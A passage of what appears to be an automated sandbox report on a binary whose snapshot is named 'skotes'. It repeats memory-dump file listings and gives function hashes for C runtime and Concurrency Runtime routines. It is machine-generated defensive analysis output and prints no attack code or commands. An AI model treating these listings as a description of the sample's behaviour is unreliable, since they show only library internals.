                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3264154886-0
                                                                                                                                                                                                                                                                • Opcode ID: 431cd38cc488a4b95bd3373c76962f1482e3ef8f84d122cc76967f8480037f67
                                                                                                                                                                                                                                                                • Instruction ID: 5ae9b1723d16cb2b13bad85c5d31551e590947add9c82283b796564d4acddefb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 431cd38cc488a4b95bd3373c76962f1482e3ef8f84d122cc76967f8480037f67
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6641C0B1A012059FDB20DF64CA44B9AB7F8FF15320F004539E816D7791EB35EA15CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00ACDB64
                                                                                                                                                                                                                                                                  • Part of subcall function 00AC8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00AC8F50
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00ACDBC3
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00ACDBE9
                                                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00ACDC56
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1091748018-0
                                                                                                                                                                                                                                                                • Opcode ID: 53943b678340b0e06fd4e5df9489c78a25b425b34dce26460991b11c5ef326b3
                                                                                                                                                                                                                                                                • Instruction ID: 4e312326a416aaa2ce6723144b67cab15b28da6a98fbe5161f9bd1c3822b73c8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53943b678340b0e06fd4e5df9489c78a25b425b34dce26460991b11c5ef326b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C141E374604214ABDF19EB24C986FBEBB79AF45310F0680ADE5069B3C2CB74AD45C7D1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00AC56F2
                                                                                                                                                                                                                                                                • _InternalDeleteHelper.LIBCONCRT ref: 00AC5726
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00AC578B
                                                                                                                                                                                                                                                                • SafeRWList.LIBCONCRT ref: 00AC579A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 893951542-0
                                                                                                                                                                                                                                                                • Opcode ID: 0fdbe90f4e21f27322e221439dc1e6483df58557334b4fccf973b0deff48ffc4
                                                                                                                                                                                                                                                                • Instruction ID: 9f3a36e04837e003c33be8e57ba47adb9abdb68a0fbad345f8b852985cdbf2ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fdbe90f4e21f27322e221439dc1e6483df58557334b4fccf973b0deff48ffc4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A31F236B016109FDF059B60C881FED77A6AF89710F1A817DE9069B255DB30BC418B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00AC2D0F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3433162309-0
                                                                                                                                                                                                                                                                • Opcode ID: a98c5fa2ba3338f19375a2466f355072231b31b8f8a11901217498579cb05fa7
                                                                                                                                                                                                                                                                • Instruction ID: f68c2fe87a3b89b5ce0441db68a549523e0e9c1aa289a1b12c4dec08ce73769d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a98c5fa2ba3338f19375a2466f355072231b31b8f8a11901217498579cb05fa7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C313775A00309DFCF11DF94C9C0FAE7BB9AB54314F1604AED902AB346D730A945DBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00AD13FC
                                                                                                                                                                                                                                                                • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00AD1447
                                                                                                                                                                                                                                                                • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00AD147A
                                                                                                                                                                                                                                                                • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00AD152A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
